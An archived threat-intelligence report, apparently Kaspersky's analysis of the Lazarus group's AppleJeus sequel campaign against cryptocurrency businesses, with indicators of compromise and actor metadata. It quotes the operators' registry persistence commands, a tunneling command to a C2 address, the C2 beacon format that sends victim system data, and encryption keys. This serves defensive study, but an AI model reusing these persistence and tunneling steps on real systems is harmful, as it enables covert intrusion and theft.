{ "id": "f7c56089-986e-463c-9ab5-ff9b7269c708", "created_at": "2026-04-06T00:11:11.20318Z", "updated_at": "2026-04-10T03:38:20.018143Z", "deleted_at": null, "sha1_hash": "ce054cf44ff8f515508a7f77b72ea6edd24fa5a1", "title": "Operation AppleJeus Sequel", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5176169, "plain_text": "Operation AppleJeus Sequel\r\nBy GReAT\r\nPublished: 2020-01-08 · Archived: 2026-04-05 16:55:15 UTC\r\nThe Lazarus group is currently one of the most active and prolific APT actors. In 2018, Kaspersky published a report on one\r\nof their campaigns, named Operation AppleJeus. Notably, this operation marked the first time Lazarus had targeted macOS\r\nusers, with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of\r\ntrust among potential victims. As a result of our ongoing efforts, we identified significant changes to the group’s attack\r\nmethodology. To attack macOS users, the Lazarus group has developed homemade macOS malware, and added an\r\nauthentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without\r\ntouching the disk. In addition, to attack Windows users, they have elaborated a multi-stage infection procedure, and\r\nsignificantly changed the final payload. We assess that the Lazarus group has been more careful in its attacks following the\r\nrelease of Operation AppleJeus and they have employed a number of methods to avoid being detected.\r\nFor more information, please contact: intelreports@kaspersky.com\r\nLife after Operation AppleJeus\r\nAfter releasing Operation AppleJeus, the Lazarus group continued to use a similar modus operandi in order to compromise\r\ncryptocurrency businesses. We found more macOS malware similar to that used in the original Operation AppleJeus case.\r\nThis macOS malware used public source code in order to build crafted macOS installers. The malware authors used\r\nQtBitcoinTrader developed by Centrabit.\r\nOriginal AppleJeus WbBot case MacInstaller case\r\nDMG file\r\nhash\r\n48ded52752de9f9b73c6bf9ae81cb429 3efeccfc6daf0bf99dcb36f247364052 c2ffbf7f2f98c73b98198b4937119a\r\nPKG file\r\nhash\r\ndab34d94ca08ba5b25edadfe67ae4607 cb56955b70c87767dee81e23503086c3 8b4c532f10603a8e199aa4281384\r\nPKG file\r\nname\r\nCelasTradePro.pkg WbBot.pkg BitcoinTrader.pkg\r\nPackaging\r\ntime\r\n2018-07-12 14:09:33 2018-11-05 6:11:38 2018-12-19 0:15:19\r\nMalicious\r\nmach-o\r\nhash\r\naeee54a81032a6321a39566f96c822f5 b63e8d4277b190e2e3f5236f07f89eee bb04d77bda3ae9c9c3b6347f7aef1\r\nC2 server www.celasllc[.]com/checkupdate.php https://www.wb-bot[.]org/certpkg.php https://www.wb-bot[.]org/certpkg.\r\nXOR key Moz\u0026Wie;#t/6T!2y 6E^uAVd-^yYkB-XG 6E^uAVd-^yYkB-XG\r\nRC4 key W29ab@ad%Df324V$Yd SkQpTUT8QEY\u0026Lg+BpB SkQpTUT8QEY\u0026Lg+BpB\r\n2nd\r\npayload\r\npath\r\n/var/zdiffsec /var/pkglibcert /var/pkglibcert\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 1 of 10\n\n2nd\r\npayload\r\nargument\r\nbf6a0c760cc642 bf6a0c760cc642 bf6a0c760cc642\r\nThese three macOS installers use a similar post installer script in order to implant a mach-o payload, as well as using the\r\nsame command-line argument when executing the fetched second-stage payload. However, they have started changing their\r\nmacOS malware. We recognized a different type of macOS malware, MarkMakingBot.dmg\r\n(be37637d8f6c1fbe7f3ffc702afdfe1d), created on 2019-03-12. It doesn’t have an encryption/decryption routine for network\r\ncommunication. We speculate that this is an intermediate stage in significant changes to their macOS malware.\r\nChange of Windows malware\r\nDuring our ongoing tracking of this campaign, we found that one victim was compromised by Windows AppleJeus malware\r\nin March 2019. Unfortunately, we couldn’t identify the initial installer, but we established that the infection started from a\r\nmalicious file named WFCUpdater.exe. At that time, the actor used a fake website: wfcwallet[.]com\r\nThe actor used a multi-stage infection like before, but the method was different. The infection started from .NET malware,\r\ndisguised as a WFC wallet updater (a9e960948fdac81579d3b752e49aceda). Upon execution, this .NET executable checks\r\nwhether the command line argument is “/Embedding” or not. This malware is responsible for decrypting the WFC.cfg file in\r\nthe same folder with a hardcoded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62). This\r\nmimics the wallet updater connected to the C2 addresses:\r\nwfcwallet.com (resolved ip: 108.174.195.134)\r\nwww.chainfun365.com (resolved ip: 23.254.217.53)\r\nAfter that, it carries out the malware operator’s commands in order to install the next stage permanent payload. The actor\r\ndelivered two more files into the victim’s system folder: rasext.dll and msctfp.dat. They used the RasMan (Remote Access\r\nConnection Manager) Windows service to register the next payload with a persistence mechanism. After fundamental\r\nreconnaissance, the malware operator implanted the delivered payload by manually using the following commands:\r\ncmd.exe /c dir rasext.dll\r\ncmd.exe /c dir msctfp.dat\r\ncmd.exe /c tasklist /svc | findstr RasMan\r\ncmd.exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v\r\nDllName /d rasext.dll /f\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 2 of 10\n\nIn order to establish remote tunneling, the actor delivered more tools, executing with command-line parameters.\r\nUnfortunately, we have had no chance to obtain this file, but we speculate that Device.exe is responsible for opening port\r\n6378, and the CenterUpdater.exe tool was used for creating tunneling to a remote host. Note that the 104.168.167.16 server\r\nis used as a C2 server. The fake website hosting server for the UnionCryptoTrader case will be described next.\r\nPort opener:\r\n%APPDATA%\\Lenovo\\devicecenter\\Device.exe 6378\r\nTunneling tool:\r\n%APPDATA%\\Lenovo\\devicecenter\\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443\r\nChange of macOS malware\r\nJMTTrading case\r\nWhile tracking this campaign, we identified more heavily deformed macOS malware. At the time, the attacker called their\r\nfake website and application JMTTrading. Other researchers and security vendors found it too, and published IoCs with\r\nabundant technical details. Malware Hunter Team tweeted about this malicious application, Vitali Kremez published a blog\r\nabout the Windows version of the malware, and Objective-See published details about the macOS malware. We believe\r\nthese reports are sufficient to understand the technical side. Here, we would like to highlight what’s different about this\r\nattack.\r\nThe actor used GitHub in order to host their malicious applications.\r\nThe malware author used Object-C instead of QT framework in their macOS malware.\r\nThe malware implemented a simple backdoor function in macOS executable.\r\nThe malware encrypted/decrypted with a 16-byte XOR key (X,%`PMk–Jj8s+6=) similar to the previous case.\r\nThe Windows version of the malware used ADVobfuscator, a compiled time obfuscator, in order to hide its code.\r\nThe post-install script of macOS malware differed significantly from the previous version.\r\nUnionCryptoTrader case\r\nWe also identified another macOS targeted attack that took place very recently. The malicious application name in this case\r\nis UnionCryptoTrader. After compiling a threat intelligence report for our customers, one security researcher\r\n(@dineshdina04) discovered an identical case, and Objective-See published a very detailed blog on the macOS malware\r\nused in this attack. The Objective-See blog goes into sufficient detail to explain the malware’s functionality, so we will just\r\nsummarize the attack:\r\nThe post-install script is identical to that used in the JMTTrading case.\r\nThe malware author used SWIFT to develop this macOS malware.\r\nThe malware author changed the method for collecting information from the infected system.\r\nThe malware starts to conduct authentication using auth_signature and auth_timestamp parameters in order to deliver\r\nthe second-stage payload more carefully. The malware acquires the current system time and combines it with the\r\n“12GWAPCT1F0I1S14” hardcoded string, and produces an MD5 hash of the combined string. This hash is used as\r\nthe value of the auth_signature parameter and the current time is used as the value of the auth_timestamp parameter.\r\nThe malware operator can reproduce the auth_signature value based on the auth_timestamp at the C2 server side.\r\nThe malware loads the next stage payload without touching the disk.\r\nWindows version of UnionCryptoTrader\r\nWe also found a Windows version of the UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec). It was executed from\r\nthe Telegram messenger download folder:\r\nC:\\Users\\[user name]\\Downloads\\Telegram Desktop\\UnionCryptoTraderSetup.exe\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 3 of 10\n\nWe also found the actor’s Telegram group on their fake website. Based on these, we assess with high confidence that the\r\nactor delivered the manipulated installer using the Telegram messenger. Unfortunately, we can’t get all the related files as\r\nsome payloads were only executed in memory. However, we can reassemble the whole infection procedure based on our\r\ntelemetry. The overall infection procedure was very similar to the WFCWallet case, but with an added injection procedure,\r\nand they only used the final backdoor payload instead of using a tunneling tool.\r\nThe UnionCryptoTrader Windows version has the following window showing a price chart for several cryptocurrency\r\nexchanges.\r\nThe Windows version of UnionCryptoTrader updater (629b9de3e4b84b4a0aa605a3e9471b31) has similar functionality to\r\nthe macOS version. According to the build path (Z:\\Loader\\x64\\Release\\WinloaderExe.pdb), the malware author called this\r\nmalware a loader. Upon launch, the malware retrieves the victim’s basic system information, sending it in the following\r\nHTTP POST format, as is the case with the macOS malware.\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 4 of 10\n\nPOST /update HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/75.0.3770.142 Safari/537.36\r\nauth_timestamp: [Current time]\r\nauth_signature: [Generated MD5 value based on current time]\r\nContent-Length: 110\r\nHost: unioncrypto.vip\r\nrlz=[BIOS serial number]\u0026amp;ei=[OS version]  ([build number])\u0026amp;act=check\r\nIf the response code from the C2 server is 200, the malware decrypts the payload and loads it in memory. Finally, the\r\nmalware sends the act=done value and return code. The next stage payload (e1953fa319cc11c2f003ad0542bca822),\r\ndownloaded from this loader, is similar to the .NET downloader in the WFCWallet case. This malware is responsible for\r\ndecrypting the Adobe.icx file in the same folder. It injects the next payload into the Internet Explorer process, and the tainted\r\niexplore.exe process carries out the attacker’s commands. The final payload (dd03c6eb62c9bf9adaf831f1d7adcbab) is\r\nimplanted manually as in the WFCWallet case. This final payload was designed to run only on certain systems. It seems that\r\nthe malware authors produced and delivered malware that only works on specific systems based on previously collected\r\ninformation. The malware checks the infected system’s information and compares it to a given value. It seems the actor\r\nwants to execute the final payload very carefully, and wants to evade detection by behavior-based detection solutions.\r\nThis Windows malware loads the encrypted msctfp.dat file in a system folder, and loads each configuration value. Then it\r\nexecutes an additional command based on the contents of this file. When the malware communicates with the C2 server, it\r\nuses a POST request with several predefined headers.\r\nPOST /[C2 script URL] HTTP/1.1\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 5 of 10\n\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: keep-alive or Connection: close\r\nUser-Agent: [User-agent of current system]\r\nHost: unioncrypto.vip\r\nFor the initial communication, the malware first sends parameters:\r\ncgu: 64bits hex value from configuration\r\naip: MD5 hash value from configuration\r\nsv: hardcoded value(1)\r\nIf the response code from the C2 server is 200, the malware sends the next POST request with encrypted data and a random\r\nvalue. The malware operator probably used the random value to identify each victim and verify the POST request.\r\nimp: Random generated value\r\ndsh: XORed value of imp\r\nhb_tp: XORed value(key: 0x67BF32) of imp\r\nhb_dl: Encrypted data to send to C2 server\r\nct: hardcoded value(1)\r\nFinally, the malware downloads the next stage payload, decrypting it and possibly executing it with the Print parameter. We\r\nspeculate that the DLL type payload will be downloaded and call its Print export function for further infection. We can’t get\r\nhold of the final payload that’s executed in memory, but we believe its backdoor-type malware is ultimately used to control\r\nthe infected victim.\r\nInfrastructures\r\nWe found several fake websites that were still online when we were investigating their infrastructure. They created fake\r\ncryptocurrency-themed websites, but they were far from perfect and most of the links didn’t work.\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 6 of 10\n\nWe found an identical Cyptian web template on the internet. We speculate that the actor used free web templates like this to\r\nbuild their fake websites. Moreover, there is a Telegram address(@cyptian) on the Cyptian website. As we mentioned\r\npreviously, the actor delivered a manipulated application via Telegram messenger. This Telegram address was still alive\r\nwhen we investigated, but there were no more activities at that time. According to the chat log, the group was created on\r\nDecember 17, 2018 and some accounts had already been deleted.\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 7 of 10\n\nConclusion\r\nWe were able to identify several victims in this Operation AppleJeus sequel. Victims were recorded in the UK, Poland,\r\nRussia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency business\r\nentities.\r\nThe actor altered their macOS and Windows malware considerably, adding an authentication mechanism in the macOS\r\ndownloader and changing the macOS development framework. The binary infection procedure in the Windows system\r\ndiffered from the previous case. They also changed the final Windows payload significantly from the well-known Fallchill\r\nmalware used in the previous attack. We believe the Lazarus group’s continuous attacks for financial gain are unlikely to\r\nstop anytime soon.\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 8 of 10\n\nSince the initial appearance of Operation AppleJeus, we can see that over time the authors have changed their modus\r\noperandi considerably. We assume this kind of attack on cryptocurrency businesses will continue and become more\r\nsophisticated.\r\nAppendix I – Indicators of Compromise\r\nFile Hashes (malicious documents, Trojans, emails, decoys)\r\nmacOS malware\r\nc2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg\r\n8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg\r\nbb04d77bda3ae9c9c3b6347f7aef19ac .loader\r\n3efeccfc6daf0bf99dcb36f247364052 4_5983241673595946132.dmg\r\ncb56955b70c87767dee81e23503086c3 WbBot.pkg\r\nb63e8d4277b190e2e3f5236f07f89eee .loader\r\nbe37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg\r\nbb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg\r\n267a64ed23336b4a3315550c74803611 .loader\r\n6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg\r\n55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg\r\nda17802bc8d3eca26b7752e93f33034b .unioncryptoupdater\r\n39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg\r\ne35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg\r\n6058368894f25b7bc8dd53d3a82d9146 .CrashReporter\r\nWindows malware\r\na9e960948fdac81579d3b752e49aceda WFCUpdater.exe\r\n24B3614D5C5E53E40B42B4E057001770 UnionCryptoTraderSetup.exe\r\n629B9DE3E4B84B4A0AA605A3E9471B31 UnionCryptoUpdater.exe\r\nE1953FA319CC11C2F003AD0542BCA822 AdobeUpdator.exe, AdobeARM.exe\r\nf221349437f2f6707ecb2a75c3f39145 rasext.dll\r\n055829E7600DBDAE9F381F83F8E4FF36 UnionCryptoTraderSetup.exe\r\nF051A18F79736799AC66F4EF7B28594B Unistore.exe\r\nFile path\r\n%SYSTEM%\\system32\\rasext.dll\r\n%SYSTEM%\\system32\\msctfp.dat\r\n%APPDATA%\\Lenovo\\devicecenter\\Device.exe\r\n%APPDATA%\\Lenovo\\devicecenter\\CenterUpdater.exe\r\n%APPDATA%\\Local\\unioncryptotrader\\UnionCryptoUpdater.exe\r\n$APPDATA%\\adobe\\AdobeUpdator.exe\r\nC:\\Programdata\\adobe\\adobeupdator.exe\r\n%AppData%\\Local\\Comms\\Unistore.exe\r\nDomains and IPs\r\nDomains\r\nwww.wb-bot.org\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 9 of 10\n\nwww.jmttrading.org\r\ncyptian.com\r\nbeastgoc.com\r\nwww.private-kurier.com\r\nwww.wb-invest.net\r\nwfcwallet.com\r\nchainfun365.com\r\nwww.buckfast-zucht.de\r\ninvesuccess.com\r\nprivate-kurier.com\r\naeroplans.info\r\nmydealoman.com\r\nunioncrypto.vip\r\nIPs\r\n104.168.167.16\r\n23.254.217.53\r\n185.243.115.17\r\n104.168.218.42\r\n95.213.232.170\r\n108.174.195.134\r\n185.228.83.32\r\n172.81.135.194\r\nURLs\r\nhttps://www.wb-bot[.]org/certpkg.php\r\nhttp://95.213.232[.]170/ProbActive/index.do\r\nhttp://beastgoc[.]com/grepmonux.php\r\nhttps://unioncrypto[.]vip/update\r\nSource: https://securelist.com/operation-applejeus-sequel/95596/\r\nhttps://securelist.com/operation-applejeus-sequel/95596/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://securelist.com/operation-applejeus-sequel/95596/" ], "report_names": [ "95596" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434271, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ce054cf44ff8f515508a7f77b72ea6edd24fa5a1.pdf", "text": "https://archive.orkl.eu/ce054cf44ff8f515508a7f77b72ea6edd24fa5a1.txt", "img": "https://archive.orkl.eu/ce054cf44ff8f515508a7f77b72ea6edd24fa5a1.jpg" } }